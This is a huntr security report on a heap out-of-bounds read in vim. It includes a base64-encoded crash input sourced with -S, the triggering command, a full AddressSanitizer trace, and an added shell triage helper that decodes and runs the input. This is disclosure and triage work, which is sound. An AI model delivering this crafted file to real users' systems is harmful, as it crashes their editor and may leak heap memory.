huntr report BCA9CE1F-400A-4BF9-9207-3F3187CB3FA9
Reporter: octaviogalland
Published: Jan 24, 2022 - 2:53 p.m. (2022-01-24 14:53:26)
Project: vim/vim
Source: www.huntr.dev

CVSS3: 7.8 High
  Attack Vector: LOCAL
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: REQUIRED
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS2: 6.8 Medium
  Access Vector: NETWORK
  Access Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS: 0.001 Low (percentile 48.7%)

Note that the two vectors disagree on how the bug is reached: CVSS3 rates it LOCAL with user interaction required, CVSS2 rates it NETWORK. The proof of concept below needs the victim to source an attacker-supplied file, which matches the CVSS3 reading; the CVSS2 rating follows the older practice of scoring an attacker-supplied file as a network vector because the file can be delivered over the network.

Description

A heap-based out-of-bounds read of size 4 occurs when vim sources the file given below (passed with -S, as a session or script file). The crash happens regardless of any command line options meant to restrict vim, such as -Z (restricted mode) and -m (modifications not allowed). The bug was found on a default vim build with AddressSanitizer enabled (latest commit hash 8e4af851fd3eff4b22fca962e5be783742e8f1bb at the time) on Ubuntu 20.04 for x86_64/amd64.

Proof of Concept

Here is the smallest PoC we were able to produce (it is base64 encoded since it contains unprintable characters; it is also fairly large, but we have not been able to minimize it further):

$ echo -ne "ZGVGEDAw7sow////f5kwMDAwMDAwMDAwMDAwMDAKICBkZWYwMDAwMDAwMDAwMDAwMDAwMDAwMDDe
AAojf+QwMDAwMDAwlo0wMDAwMDAwMDAwMApbCiBzaWwhbm9ybTBlZW5kcyBzaWwhbm9ybTBSHirt
kTB7DS8vA1ZubyAgbm9yCjB1CnN1ISowMDAwMDAwCnNpbCFub3JthyogKiBub3Iwbm+Nks+KZHN1
ISosKgtub35tMHUJc2n/AApzaQAKICBkZWYgU2Vjb25kRnVuY3RpwTAwMDAwMDAwMDAwMDCsMDAw
KDAJMDAwMDAwMDAwMDAwMDAwMDAwMDAwCm4=" | base64 -d > poc
$ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ':qa!'
=================================================================
==52803==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000085b1 at pc 0x7f76508e5f40 bp 0x7ffe59bfb120 sp 0x7ffe59bfa8c8
READ of size 4 at 0x6020000085b1 thread T0
    #0 0x7f76508e5f3f in __interceptor_memmove (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f)
    #1 0x55b8deba6cce in ml_flush_line /home/faraday/vim/src/memline.c:4028
    #2 0x55b8deba0811 in ml_append_flush /home/faraday/vim/src/memline.c:3313
    #3 0x55b8deba0a6c in ml_append_flags /home/faraday/vim/src/memline.c:3358
    #4 0x55b8deba0956 in ml_append /home/faraday/vim/src/memline.c:3345
    #5 0x55b8de739794 in open_line /home/faraday/vim/src/change.c:2139
    #6 0x55b8dec75acf in n_opencmd /home/faraday/vim/src/normal.c:6528
    #7 0x55b8dec8320e in nv_open /home/faraday/vim/src/normal.c:7664
    #8 0x55b8dec3ab1f in normal_cmd /home/faraday/vim/src/normal.c:1120
    #9 0x55b8de9972ac in exec_normal /home/faraday/vim/src/ex_docmd.c:8629
    #10 0x55b8de99706b in exec_normal_cmd /home/faraday/vim/src/ex_docmd.c:8592
    #11 0x55b8de996589 in ex_normal /home/faraday/vim/src/ex_docmd.c:8510
    #12 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
    #13 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
    #14 0x55b8deec9c2f in do_source /home/faraday/vim/src/scriptfile.c:1512
    #15 0x55b8deec6c0c in cmd_source /home/faraday/vim/src/scriptfile.c:1098
    #16 0x55b8deec6dc9 in ex_source /home/faraday/vim/src/scriptfile.c:1124
    #17 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
    #18 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
    #19 0x55b8de949fa7 in do_cmdline_cmd /home/faraday/vim/src/ex_docmd.c:587
    #20 0x55b8df446dc9 in exe_commands /home/faraday/vim/src/main.c:3091
    #21 0x55b8df4388bf in vim_main2 /home/faraday/vim/src/main.c:774
    #22 0x55b8df437da5 in main /home/faraday/vim/src/main.c:426
    #23 0x7f764ee940b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #24 0x55b8de6c0cbd in _start (/home/faraday/vim/src/vim+0x125ccbd)

0x6020000085b1 is located 0 bytes to the right of 1-byte region [0x6020000085b0,0x6020000085b1)
allocated by thread T0 here:
    #0 0x7f7650952bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
    #1 0x55b8de6c117e in lalloc /home/faraday/vim/src/alloc.c:248
    #2 0x55b8de6c0f29 in alloc /home/faraday/vim/src/alloc.c:151
    #3 0x55b8de6c13c2 in vim_memsave /home/faraday/vim/src/alloc.c:601
    #4 0x55b8deba0ce3 in ml_replace_len /home/faraday/vim/src/memline.c:3435
    #5 0x55b8df128fec in u_undoredo /home/faraday/vim/src/undo.c:2811
    #6 0x55b8df1262cb in undo_time /home/faraday/vim/src/undo.c:2563
    #7 0x55b8de991611 in ex_undo /home/faraday/vim/src/ex_docmd.c:7979
    #8 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
    #9 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
    #10 0x55b8deec9c2f in do_source /home/faraday/vim/src/scriptfile.c:1512
    #11 0x55b8deec6c0c in cmd_source /home/faraday/vim/src/scriptfile.c:1098
    #12 0x55b8deec6dc9 in ex_source /home/faraday/vim/src/scriptfile.c:1124
    #13 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
    #14 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
    #15 0x55b8de949fa7 in do_cmdline_cmd /home/faraday/vim/src/ex_docmd.c:587
    #16 0x55b8df446dc9 in exe_commands /home/faraday/vim/src/main.c:3091
    #17 0x55b8df4388bf in vim_main2 /home/faraday/vim/src/main.c:774
    #18 0x55b8df437da5 in main /home/faraday/vim/src/main.c:426
    #19 0x7f764ee940b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f) in __interceptor_memmove
Shadow bytes around the buggy address:
  0x0c047fff9060: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff9070: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff9080: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff9090: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff90a0: fa fa fd fa fa fa fd fa fa fa 03 fa fa fa 00 05
=>0x0c047fff90b0: fa fa fd fa fa fa[01]fa fa fa 01 fa fa fa fd fd
  0x0c047fff90c0: fa fa 00 01 fa fa fd fa fa fa fd fd fa fa 01 fa
  0x0c047fff90d0: fa fa 00 03 fa fa 01 fa fa fa fd fa fa fa fd fa
  0x0c047fff90e0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa 00 01
  0x0c047fff90f0: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
  0x0c047fff9100: fa fa 02 fa fa fa 00 01 fa fa fd fa fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==52803==ABORTING
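
The following triage helper is an added example for this report; it is not part of the huntr submission or of vim. It rebuilds the PoC file from the base64 blob above, runs it against an AddressSanitizer build of vim with the exact flags the report uses, and condenses the resulting ASan report into one line: error kind, access kind and size, size of the heap region hit and the distance from it, and the first in-project frame of the faulting access and of the allocation. Run on the report above it yields a 4-byte READ on a 1-byte region at ml_flush_line (memline.c:4028), allocated by ml_replace_len (memline.c:3435) from u_undoredo, which is what a triager wants before reading the full trace. The function names (write_poc, run_poc, asan_summary, sample_report), the vim binary location in VIM_ASAN (default ./vim) and the skip pattern for allocator wrappers are assumptions; the sample report embedded in the script is an excerpt of the ASan output printed above.

```sh
#!/bin/sh
# Added triage helper for the vim ASan report; not part of the huntr report or
# of vim. Assumptions: an AddressSanitizer build of vim at $VIM_ASAN (default
# ./vim), base64 and POSIX awk on PATH.

# Base64 PoC blob copied from the report above.
POC_B64='ZGVGEDAw7sow////f5kwMDAwMDAwMDAwMDAwMDAKICBkZWYwMDAwMDAwMDAwMDAwMDAwMDAwMDDe
AAojf+QwMDAwMDAwlo0wMDAwMDAwMDAwMApbCiBzaWwhbm9ybTBlZW5kcyBzaWwhbm9ybTBSHirt
kTB7DS8vA1ZubyAgbm9yCjB1CnN1ISowMDAwMDAwCnNpbCFub3JthyogKiBub3Iwbm+Nks+KZHN1
ISosKgtub35tMHUJc2n/AApzaQAKICBkZWYgU2Vjb25kRnVuY3RpwTAwMDAwMDAwMDAwMDCsMDAw
KDAJMDAwMDAwMDAwMDAwMDAwMDAwMDAwCm4='

# write_poc FILE: decode the blob into FILE (base64 decoders ignore the line breaks).
write_poc() {
    printf '%s\n' "$POC_B64" | base64 -d > "$1"
}

# run_poc FILE LOG: source the PoC with the report's restrictive flags and keep
# ASan's stderr output in LOG. vim aborts under ASan, so the exit status is ignored.
run_poc() {
    "${VIM_ASAN:-./vim}" -u NONE -i NONE -n -X -Z -e -m -s -S "$1" -c ':qa!' 2> "$2" || true
}

# asan_summary [SKIP_RE]: read an ASan report on stdin and print one line:
#   KIND ACCESS SIZE REGION DIST SIDE ACCESS_FRAME ALLOC_FRAME
# The two frames are the first ones not matching SKIP_RE (default: libasan and
# libc) in the access trace and in the allocation trace, as func@file:line.
# Pass a wider pattern to skip a project's own allocator wrappers as well.
asan_summary() {
    awk -v skip="${1:-libasan|libc[.]so}" '
        /^==[0-9]+==ERROR: AddressSanitizer:/      { kind = $3; section = "access" }
        /^(READ|WRITE) of size [0-9]+ at /         { access = $1; asize = $4 }
        / is located [0-9]+ bytes to the (left|right) of [0-9]+-byte region/ {
            dist = $4; side = $8; rsize = $10; sub(/-byte$/, "", rsize)
        }
        /^allocated by thread/                     { section = "alloc" }
        /^freed by thread/                         { section = "free" }
        /^ *#[0-9]+ 0x[0-9a-f]+ in / && $0 !~ skip {
            n = split($5, path, "/"); frame = $4 "@" path[n]
            if (section == "access" && aframe == "") aframe = frame
            if (section == "alloc"  && lframe == "") lframe = frame
        }
        END { print kind, access, asize, rsize, dist, side, aframe, lframe }
    '
}

# sample_report: excerpt of the ASan output printed in the report above, so the
# summary can be exercised without an ASan build of vim.
sample_report() {
    cat <<'EOF'
==52803==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000085b1 at pc 0x7f76508e5f40 bp 0x7ffe59bfb120 sp 0x7ffe59bfa8c8
READ of size 4 at 0x6020000085b1 thread T0
    #0 0x7f76508e5f3f in __interceptor_memmove (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f)
    #1 0x55b8deba6cce in ml_flush_line /home/faraday/vim/src/memline.c:4028
    #2 0x55b8deba0811 in ml_append_flush /home/faraday/vim/src/memline.c:3313
    #3 0x55b8deba0a6c in ml_append_flags /home/faraday/vim/src/memline.c:3358
    #4 0x55b8deba0956 in ml_append /home/faraday/vim/src/memline.c:3345
    #5 0x55b8de739794 in open_line /home/faraday/vim/src/change.c:2139

0x6020000085b1 is located 0 bytes to the right of 1-byte region [0x6020000085b0,0x6020000085b1)
allocated by thread T0 here:
    #0 0x7f7650952bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
    #1 0x55b8de6c117e in lalloc /home/faraday/vim/src/alloc.c:248
    #2 0x55b8de6c0f29 in alloc /home/faraday/vim/src/alloc.c:151
    #3 0x55b8de6c13c2 in vim_memsave /home/faraday/vim/src/alloc.c:601
    #4 0x55b8deba0ce3 in ml_replace_len /home/faraday/vim/src/memline.c:3435
    #5 0x55b8df128fec in u_undoredo /home/faraday/vim/src/undo.c:2811
EOF
}

# Stand-alone use: sh triage.sh run  -> writes poc and poc.asan.log, prints the
# summary with vim's own allocator wrappers (alloc.c) skipped.
if [ "${1:-}" = "run" ]; then
    write_poc poc
    run_poc poc poc.asan.log
    asan_summary 'libasan|libc[.]so|/alloc[.]c:' < poc.asan.log
fi
```

With the default skip pattern the allocation frame reported is lalloc (alloc.c:248), vim's malloc wrapper; passing a pattern that also excludes alloc.c moves it to ml_replace_len (memline.c:3435), the line that actually created the 1-byte region during undo. The report does not state how the ASan build was made; one common way, assumed here, is to configure vim with CFLAGS='-g -O1 -fsanitize=address' LDFLAGS='-fsanitize=address' in the environment before running make.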

Impact

This vulnerability can disclose data (heap memory beyond the line buffer being copied) and might be used to bypass protection mechanisms such as address space layout randomization if the leaked bytes reach the attacker, facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution. The proof of concept above demonstrates only the out-of-bounds read under AddressSanitizer; it does not show a controlled leak.

Acknowledgements

This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.
